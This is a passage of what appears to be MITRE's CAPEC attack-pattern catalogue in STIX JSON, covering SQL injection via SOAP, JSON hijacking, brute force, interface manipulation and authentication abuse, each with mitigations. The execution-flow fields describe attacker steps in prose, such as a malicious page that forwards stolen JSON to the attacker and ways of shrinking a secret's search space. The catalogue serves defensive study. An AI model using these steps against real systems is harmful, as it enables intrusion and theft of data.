  1. Detect Incorrect SOAP Parameter Handling: The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.

  2. Techniques
    The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior.

Experiment

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query.

Exploit

  1. Inject SQL via SOAP Parameters: The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.

  2. Techniques
    An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SOAP messages are used as a communication mechanism in the system", + "SOAP parameters are not properly validated at the service provider", + "The service provider does not properly utilize parameter binding when building SQL queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "If the attacker has to perform Blind SQL Injection", + "Medium": "If the attacker is able to gain good understanding of the system's database schema" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate and sanitize/reject user input at the service provider.", + "id": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3a9b355-487c-4cfd-904c-055007648f78", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "spec_version": "2.1", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that prepared statements 
or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.", + "id": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecba2a2e-f73d-4937-9f4e-d8650932e41a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "spec_version": "2.1", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. 
When possible, run queries against pre-generated views rather than the tables directly.", + "id": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0ab5963-a4b2-4dab-aeee-924ec742c54a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "spec_version": "2.1", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.", + "external_references": [ + { + "external_id": "CAPEC-111", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/111.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": 
"CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + } + ], + "id": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "JSON Hijacking (aka JavaScript Hijacking)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.\n When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. 
These contents could then be transferred to the site controlled by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand How to Request JSON Responses from the Target System: An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.

  2. Techniques
    An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit.

Experiment

  1. [Craft a malicious website]The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:\n \n 1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).\n 2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker.\n \n This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain.\n

Exploit

  1. Launch JSON hijack: An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in.

  2. Techniques
    An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers' malicious code executing in the victim's browser.
", + "x_capec_extended_description": "\n An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server.\n There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "JSON is used as a transport mechanism between the client and the server", + "The target server cannot differentiate real requests from forged requests", + "The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.", + "id": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ac6c9-0bf4-4b2b-80c8-407013b2e9fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. 
Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.", + "id": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce344fe2-2f03-491f-a465-a5e7578ca3aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.", + "id": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ccdf4c19-dc2a-46b4-b444-b78da5d0300f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset.", + "external_references": [ + { + "external_id": "CAPEC-112", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Brute Force", + "external_id": "T1110", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110" + }, + { + "description": "Brute Force", + "external_id": "11", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Brute-Force" + }, + { + "description": "Brute force attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Brute_force_attack" + } + ], + "id": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Brute Force", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine secret testing procedure: Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.

  2. Techniques
    Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded.
  3. Reduce search space: Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.

  4. Techniques
    If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)
    If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.
    If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.
    Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret.
  5. Expand victory conditions: It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value.

Exploit

  1. Gather information so attack can be performed independently.: If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords).

", + "x_capec_extended_description": "\n Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_prerequisites": [ + "The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures." + ], + "x_capec_skills_required": { + "Low": "The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.", + "id": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc237ef1-9283-4680-b8d0-9ef4a0cf8147", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secret space that is well known and with no known patterns that may reduce functional size.", + "id": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c266ae48-e3db-42b8-b3ce-57936242fa62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.", + "id": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--720b2d97-9125-482c-b7b3-c17acce30c06", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An 
adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.", + "external_references": [ + { + "external_id": "CAPEC-113", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-1192", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1192.html" + } + ], + "id": "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interface Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.", + "API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. 
As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.", + "SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "attack-pattern--f90601a6-9e18-4e96-804d-01a4f4ea30f2", + "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5" + ], + "x_capec_prerequisites": [ + "The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges." + ], + "x_capec_resources_required": [ + "The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. 
In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.", + "external_references": [ + { + "external_id": "CAPEC-114", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1244", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1244.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. 
This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way." + ], + "x_capec_resources_required": [ + "A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. 
